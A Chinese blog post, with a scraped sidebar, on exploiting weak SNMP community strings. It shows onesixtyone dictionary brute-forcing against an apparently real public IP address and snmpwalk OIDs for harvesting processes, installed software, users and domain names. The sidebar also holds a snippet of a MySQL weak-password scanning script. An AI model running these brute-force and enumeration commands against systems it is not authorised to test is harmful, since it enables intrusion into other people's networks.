科普Snmap:

  简单网络管理协议(SNMP) 是专门设计用于在 IP 网络管理网络节点(服务器、工作站、路由器、交换机及HUBS等)的一种标准协议,它是一种应用层协议。具体废话就不多说了,自己百度去。默认端口号是:161

如果能获取只读(RO)或读/写(RW)权限的团体字符串,将对你从设备中提取信息发挥重要作用,

snmp v1 v2天生存在安全缺陷,snmp v3中添加了加密功能提供了更好的检查机制,增强了安全性为了获取管理一台交换机的权限,首先你需要找到它的SNMP团体字符串。

团体字符串默认为:public

如果你不知道目标团体字符串

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 58.215.76.23 -o my.log -w 100

显示对方团体字符串为 public

查看onesixtyone 目录

dpkg -L onesixtyone

查看自带密码目录,你也可以使用自己的字典

cat /usr/share/doc/onesixtyone/dict.txt





snmpwalk -c public -v 1  ip .1.3.6.1.2.1.25.1 得到取得windows端的系统进程用户数等


snmpwalk -c public -v 1 ip .1.3.6.1.2.1.25.2.2 取得系统总内存


snmpwalk -c public -v 1  ip hrSystemNumUsers 取得系统用户数


snmpwalk -c public -v 1  ip .1.3.6.1.2.1.4.20 取得IP信息


snmpwalk -v 2c -c public ip .1.3.6.1.2.1.1 查看系统信息


其中-v是指版本,-c 是指密钥。


snmpwalk功能很多,可以获取系统各种信息,只要更改后面的信息类型即可。如果不知道什么类型,也可以不指定,这样所有系统信息都获取到:


常用:snmpwalk -v 2c -c public 10.0.1.52


另外常用的


.1.3.6.1.4.1.77.1.4.1.0  列出域名
.1.3.6.1.2.1.25.6.3.1.2  列出安装的软件


.1.3.6.1.2.1.25.4.2.1.2  列出系统进程


展示一波成功的案例:






 
												


											
snmap弱口令攻击利用的更多相关文章
	

    
								
  1. oracle弱口令攻击
		
    oracle弱口令攻击   0x00 oracle数据库简介 oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 一.支持大数据 ...
    
		
    2. 
						
  2. 全国职业技能大赛信息安全管理与评估-MySQL弱口令利用
		
    MySQL读文件 #coding=utf-8 import MySQLdb host = '172.16.1.' for i in range(129,131): tag = host+str(i)  ...
    
		
    3. 
						
  3. 攻防世界-Web-lottery(.git泄露、php源码审计、弱类型利用)
		
    扫描目录,发现.git泄露: 提取.git泄露的源码,得到许多文件: 网站这里: 这就要审计一下代码,找找漏洞了. 经过一番审计,猜数字对应的函数在api.php中: 我们要绕过这个$win_numb ...
    
		
    4. 
						
  4. IoT设备上的恶意软件——通过漏洞、弱密码渗透
		
    2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网.随着5G网络的发展,我们身边的 IoT 设备会越来越多.与此同时,IoT 的安全问题也慢慢 ...
    
		
    5. 
						
  5. 简单说说.Net中的弱引用
		
    弱引用是什么? 要搞清楚什么是弱引用,我们需要先知道强引用是什么.强引用并不是什么深奥的概念,其实我们平时所使用的.Net引用就是强引用.例如: Cat kitty = new Cat(); 变量ki ...
    
		
    6. 
						
  6. .NET中的弱引用
		
    弱引用是什么? 要搞清楚什么是弱引用,我们需要先知道强引用是什么.强引用并不是什么深奥的概念,其实我们平时所使用的.Net引用就是强引用.例如: Cat cat = new Cat(); 变量cat就 ...
    
		
    7. 
						
  7. snmp默认团体名/弱口令漏洞及安全加固
		
    0x00基础知识 简单网络管理协议(SNMP)被广泛用于计算机操作系统设备.网络设备等领域监测连接到网络上的设备是否有任何引起管理上关注的情况.在运行SNMP服务的设备上,若管理员配置不当运行默认团体 ...
    
		
    8. 
						
  8. Linux安全事件应急响应排查方法总结
		
    Linux安全事件应急响应排查方法总结 Linux是服务器操作系统中最常用的操作系统,因为其拥有高性能.高扩展性.高安全性,受到了越来越多的运维人员追捧.但是针对Linux服务器操作系统的安全事件也非 ...
    
		
    9. 
						
  9. Window应急响应(四):挖矿病毒
		
    0x00 前言 ​ 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. js实现数组去重怎么实现?
			
    方法1. 创建一个新的临时数组来保存数组中已有的元素 var a = new Array(1,2,2,2,2,5,3,2,9,5,6,3); Array.prototype.unique1 = fun ...
    
			
    2. 
						
  2. 在JavaScript里的“对象字面量”是什么意思?
			
    字面量表示如何表达这个值,一般除去表达式,给变量赋值时,等号右边都可以认为是字面量.字面量分为字符串字面量(string literal ).数组字面量(array literal)和对象字面量(ob ...
    
			
    3. 
						
  3. Spring学习笔记(七)模拟实际开发过程的调用过程XML版-Setter方式注入
			
    模拟实际开发过程的调用过程XML版-Setter方式注入 源码获取github [TOC] 1.项目结构 2.jar包跟上个一样 3.重写set方法 UserServiceImpl.java 1234 ...
    
			
    4. 
						
  4. 《人性与暴力-论暴力侵略》ER
			
    card level 人名卡 反常识卡 世界发生了什么? - 信息爆炸 信息与信任构成了人类发展两大命题 人性史与暴力史 未来世界会变得怎么样?- 历史不会重复,但会押韵.暴力呈现下降. 改变世界的三 ...
    
			
    5. 
						
  5. P1097 统计数字
			
    P1097题库链接:https://www.luogu.org/problem/P1097 难度:普及- 算法标签:模拟,排序,概率论 1.桶模拟 O(n) 得分20 由于题目让统计数出现的次数,并按 ...
    
			
    6. 
						
  6. Java核心技术卷1 第10版 笔记
			
    3.3 数据类型 Java是一种强类型语言.必须为每一个变量声明一种类型.在java中,一共有8终基本类型. 3.3.1 整形 类型 存储需求 取值范围 int 4字节 -2 147 483 648  ...
    
			
    7. 
						
  7. czC#02
			
    1.out参数 out参数要求在方法的内部必须为其赋值 using System; using System.Text; namespace Demo { class Program { //返回一个 ...
    
			
    8. 
						
  8. Web 认证配置流程
			
    AC配置 Radius配置 Portal配置
    
			
    9. 
						
  9. 处理公共CDN突然失效的情况
			
    公共CDN的使用 刚开始开发我的博客时,使用的bootcdn,发现他们被黑过,虽然想骂那些“黑客”,但是我们也没办法去防范,只能从自己的网站上入手解决. 那时我还没技术解决这个问题,网上搜过,大都只提 ...
    
			
    10. 
						
  10. Vuex的理解以及它的辅助函数
			
    理解:vue中的“单向数据流”,这里借用官网的图示: Vue是单向数据流,v-model只是语法糖而已.单向数据流就是:数据总是[向下传递]从父级组件传递给子组件,只能单向绑定.子组件内部不能直接修改 ...
    
			
    11.